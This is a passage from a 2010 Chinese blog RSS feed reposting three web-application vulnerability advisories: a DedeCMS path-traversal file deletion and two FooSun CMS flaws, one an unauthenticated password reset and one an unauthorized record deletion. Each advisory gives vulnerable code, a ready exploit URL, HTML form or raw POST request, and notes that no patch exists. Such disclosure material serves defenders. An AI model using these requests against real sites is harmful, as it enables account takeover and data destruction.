file_exists($cfg_basedir.$oldface))<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@unlink($cfg_basedir.$oldface);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br/><br/>只判断oldface 前面是否在目录下，没包括过滤 ../<br/>但有验证&nbsp;&nbsp;\.(jpg|gif|png)$&nbsp;&nbsp;，所以只能删除&nbsp;&nbsp;jpg , gif ,png 类型的文件<br/>测试方法:<br/><a href="http://sitedir.com.cn/member/edit_face.php?dopost=delold" target="_blank" rel="external">http://sitedir.com.cn/member/edit_face.php?dopost=delold</a>&amp;oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif<br/>厂商补丁：<br/>DedeCMS<br/>-------<br/>目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：<br/><a href="http://www.dedecms.com/" target="_blank" rel="external">http://www.dedecms.com/</a><br/><br/>文章转载自『非安全中国网』地址: <a href="http://www.sitedir.com.cn/exploit-1230.html" target="_blank" rel="external">http://www.sitedir.com.cn/exploit-1230.html</a>]]></description>
		</item>
		
			<item>
			<link>http://www.0354hk.com/article.asp?id=471</link>
			<title><![CDATA[风讯（FooSun）GetPassword.asp任意修改密码漏洞]]></title>
			<author>chenliangsx@gmail.com(admin)</author>
			<category><![CDATA[漏洞相关]]></category>
			<pubDate>Sun,18 Jul 2010 12:50:13 +0800</pubDate>
			<guid>http://www.0354hk.com/default.asp?id=471</guid>
		<description><![CDATA[影响版本:<br/>FooSun &gt; 5.0漏洞描述:<br/>FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。<br/><br/>在文件\User\ GetPassword.asp中：<br/>ElseIf Request.Form(&#34;Action&#34;) = &#34;step3&#34; then //第28行<br/>Call step3()<br/>……<br/>Sub step3() //第198行<br/>Dim p_pass_new,p_confim_pass_new<br/>p_pass_new = md5(Request.Form(&#34;pass_new&#34;),16)<br/>……<br/>User_Conn.execute(&#34;Up&#100;ate FS_ME_Users set UserPassword =&#39;&#39;&#34;&amp; NoSqlHack(p_pass_new) &amp;&#34;&#39;&#39; wh&#101;re UserName = &#39;&#39;&#34;&amp; NoSqlHack(StrUserName) &amp;&#34;&#39;&#39; and Email = &#39;&#39;&#34;&amp; NoSqlHack(Replace(Request.Form(&#34;Email&#34;),&#34;&#39;&#39;&#39;&#39;&#34;,&#34;&#34;))&amp;&#34;&#39;&#39;&#34;) //第220行<br/>用户可以本地构造表单使程序直接进入修改密码，只需要知道用户名和邮箱。&lt;*参考 <br/>Bug.Center.Team<br/>*&gt;<br/>测试方法:<br/>&lt;form id=&#34;form1&#34; name=&#34;form1&#34; method=&#34;post&#34; action=&#34;<a href="http://www.sitedir.com.cn" target="_blank" rel="external">http://www.sitedir.com.cn</a>(测试网站地址)/User/GetPassword.asp&#34;&gt;<br/>&lt;input name=&#34;Action&#34; type=&#34;text&#34; id=&#34;Action&#34; value=&#34;step3&#34; /&gt;<br/>&lt;input name=&#34;pass_new&#34; type=&#34;text&#34; id=&#34;pass_new&#34; value=&#34;123456&#34; /&gt;<br/>&lt;input name=&#34;confim_pass_new&#34; type=&#34;text&#34; id=&#34;confim_pass_new&#34; value=&#34;123456&#34; /&gt;<br/>&lt;input name=&#34;Email&#34; type=&#34;text&#34; id=&#34;Email&#34; value=&#34;bb@126.com&#34; /&gt;<br/>&lt;input name=&#34;UserName&#34; type=&#34;text&#34; id=&#34;UserName&#34; value=&#34;bb&#34; /&gt;<br/>&lt;input type=&#34;submit&#34; name=&#34;Submit&#34; value=&#34;提交&#34; /&gt;<br/>&lt;/form&gt;<br/>厂商补丁：<br/>FooSun<br/>-------<br/>目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：<br/><a href="http://www.foosun.net/" target="_blank" rel="external">http://www.foosun.net/</a><br/><br/>文章转载自『非安全中国网』地址: <a href="http://www.sitedir.com.cn/exploit-1229.html" target="_blank" rel="external">http://www.sitedir.com.cn/exploit-1229.html</a>]]></description>
		</item>
		
			<item>
			<link>http://www.0354hk.com/article.asp?id=470</link>
			<title><![CDATA[风讯网站管理系统页面越权漏洞]]></title>
			<author>chenliangsx@gmail.com(admin)</author>
			<category><![CDATA[漏洞相关]]></category>
			<pubDate>Sun,18 Jul 2010 12:49:37 +0800</pubDate>
			<guid>http://www.0354hk.com/default.asp?id=470</guid>
		<description><![CDATA[影响版本:<br/>FooSun &gt; 5.0<br/><br/>程序介绍:<br/>FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。<br/><br/>漏洞分析:<br/><br/><br/>在文件\User\ Corp_card_Unpass.asp中：<br/> <br/>If Request.Form(&#34;Action&#34;) = &#34;Save&#34; then //第14行<br/> <br/>Dim DelID,Str_Tmp,Str_Tmp1<br/> <br/>DelID = request.Form(&#34;CorpCardID&#34;)<br/> <br/>if DelID = &#34;&#34; then<br/> <br/>strShowErr = &#34;&lt;li&gt;你必须选择一项再删除&lt;/li&gt;&#34;<br/> <br/>Call ReturnError(strShowErr,&#34;&#34;)<br/> <br/>End if<br/> <br/>User_Conn.execute(&#34;Del&#101;te From FS_ME_CorpCard wh&#101;re CorpCardID in (&#34;&amp;FormatIntArr(DelID)&amp;&#34;)&#34;)<br/> <br/>程序在执行删除记录时，没有验证用户的合法性导致可以任意删除他人记录。<br/><br/><br/>漏洞利用:<br/><br/>POST /User/Corp_card_Unpass.asp HTTP/1.1<br/> <br/>Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*<br/> <br/>Accept-Language: zh-cn<br/> <br/>Content-Type: application/x-www-form-urlencoded<br/> <br/>UA-CPU: x86<br/> <br/>Accept-Encoding: gzip, deflate<br/> <br/>User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0; .NET CLR 2.0.50727)<br/> <br/>Host: aaaa.1122.org<br/> <br/>Content-Length: 44<br/> <br/>Connection: Keep-Alive<br/> <br/>Cache-Control: no-cache<br/> <br/>Cookie: FoosunSUBCookie=FoosunSUBMF=1&amp;FoosunSUBNS=1&amp;FoosunSUBDS=1&amp;FoosunSUBME=1&amp;FoosunSUBCS=1&amp;FoosunSUBSS=1&amp;FoosunSUBVS=1&amp;FoosunSUBAS=1&amp;FoosunSUBWS=1&amp;FoosunSUBFL=1; FoosunDSCookies=FoosunDSLinkType=0&amp;FoosunDSIndexTemplet=%2FTemplets%2Fdown%2Findex%2Ehtm&amp;FoosunDSIndexPage=index%2Ehtml&amp;FoosunDSDownDir=down&amp;FoosunDSDomain=&amp;FoosunDSOverDueMode=1&amp;FoosunDSIPList=&amp;FoosunDSIPType=1&amp;FoosunDSLock=1; FoosunNSCookies=FoosunNSSiteName=%D0%C2%CE%C5%CF%B5%CD%B3&amp;FoosunNSLinkType=0&amp;FoosunNSIndexTemplet=%2FTemplets%2FNewsClass%2Findex%2Ehtm&amp;FoosunNSIndexPage=index%2Ehtml&amp;FoosunNSNewsDir=%2F&amp;FoosunNSDomain=; FoosunMFCookies=FoosunMFCopyright=%CB%C4%B4%A8%B7%E7%D1%B6%BF%C6%BC%BC%B7%A2%D5%B9%D3%D0%CF%DE%B9%AB%CB%BE%B0%E6%C8%A8%CB%F9%D3%D0%A3%A1&amp;FoosunMFIndexFileName=index%2Ehtml&amp;FoosunMFIndexTemplet=%2FTemplets%2FIndex%2Ehtm&amp;FoosunMFWriteType=0&amp;FoosunMFPicClassid=9&amp;FoosunMFMarkType=1&amp;FoosunMFEmail=service%40foosun%2Ecn&amp;FoosunMFVersion=4%2E0+Sp5&amp;FoosunMFsiteName=%CB%C4%B4%A8%B7%E7%D1%B6%BF%C6%BC%BC%B7%A2%D5%B9%D3%D0%CF%DE%B9%AB%CB%BE&amp;FoosunMFDomain=localhost; FoosunSearchCookie=Cookie%5FSite%5FName=%CB%C4%B4%A8%B7%E7%D1%B6%BF%C6%BC%BC%B7%A2%D5%B9%D3%D0%CF%DE%B9%AB%CB%BE&amp;Cookie%5FeMail=service%40foosun%2Ecn&amp;Cookie%5FCopyright=%CB%C4%B4%A8%B7%E7%D1%B6%BF%C6%BC%BC%B7%A2%D5%B9%D3%D0%CF%DE%B9%AB%CB%BE%B0%E6%C8%A8%CB%F9%D3%D0%A3%A1&amp;Cookie%5FDomain=localhost; ASPSESSIONIDASRRTCAB=BAKHNIGDKFJEDAMHFGBFJEPB; FoosunUserCookies=UserLogin%5FStyle%5FNum=2; FoosunUserlCookies=FS%5FUser%5FLogin%5FNumber=0; ASPSESSIONIDCQRQSDBB=MKKBHBIDCLJIMJGOLIMJPDAC<br/> <br/> <br/>Action=Save&amp;CorpCardID=1&amp;Submit=%CC%E1%BD%BB<br/><br/><br/>解决方案:<br/>厂商补丁：<br/>FooSun<br/>-------<br/>目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：<br/><a href="http://www.foosun.net/" target="_blank" rel="external">http://www.foosun.net/</a><br/><br/>信息来源:<br/>&lt;*来源: Bug.Center.Team<br/>链接: <a href="http://wavdb.com/vuln/1674" target="_blank" rel="external">http://wavdb.com/vuln/1674</a><br/>*&gt;<br/><br/>文章转载自『非安全中国网』地址: <a href="http://www.sitedir.com.cn/exploit-1225.html" target="_blank" rel="external">http://www.sitedir.com.cn/exploit-1225.html</a>]]></description>
		</item>
		
</channel>
</rss>
